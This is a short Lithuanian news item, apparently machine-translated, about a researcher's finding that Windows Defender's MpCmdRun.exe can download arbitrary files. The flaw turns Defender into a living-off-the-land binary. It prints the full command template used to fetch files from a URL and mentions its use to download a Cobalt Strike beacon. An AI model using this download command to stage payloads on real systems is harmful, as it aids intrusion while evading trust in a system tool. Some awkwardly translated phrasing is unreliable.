„Windows Defender“ virsta pavojinga programa, skirta administratoriams

„Windows Defender“, esanti „Windows 10“, yra pirmoji gynybos linija kenkėjiškų programų atakų atveju ir tai daro gana geras darbas irgi.

Tačiau viename iš naujų atnaujinimų galinga antivirusinė programa gavo naują komandą „DownloadFile“, kuri leis visiems atsisiųsti bet kokį failą iš URL į tam tikrą jūsų kompiuterio kelią.

Mes galime tai vadinti išnaudojimu, nes jis taip pat gali būti naudojamas net atsisiųsti kenkėjiškas programas, kurias atrado saugumo tyrėjas Mohammadas Askaras, kuris paskelbta jo radinys „Twitter“.

Kaip „Windows Defender“ galima naudoti norint atsisiųsti kenkėjiškas programas?

Tikrai paprasta naudoti „Microsoft Antimalware Service“ komandų eilutės įrankį (MpCmdRun.exe), norint atsisiųsti bet kokį failą iš išorinio šaltinio į kompiuterį.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

Bandydamas Askarą galėjo atsisiųsti „Cobalt Strike beacon“, gerai žinomą užpuolikų įrankį, naudodamas šią komandinę eilutę.

Nauja komanda yra įtraukta į versiją 4.18.2007.8-0 ir naujesnės versijos, o tai suteikia gana gerą užpuolikų pradžios laiką.

Iš esmės ši funkcija pasisuka Windows Defender į LOLBIN (gyvena ne pagal dvejetaines linijas), nepavojingą sistemos failą, kurį galima naudoti kenkėjiškiems tikslams.

Laimei, atsisiųsdami kenksmingą failą, jį aptiks tas pats „Windows Defender“ arba kitas antivirusinę programinę įrangą jei yra.

Iš patikimos apsaugos programinės įrangos „Windows Defender“ tapo dar viena galima grėsme, kurią turės atidžiai stebėti administratoriai ir saugumo ekspertai.

Jei turite kokių nors pasiūlymų ar komentarų, palikite juos komentarų skiltyje.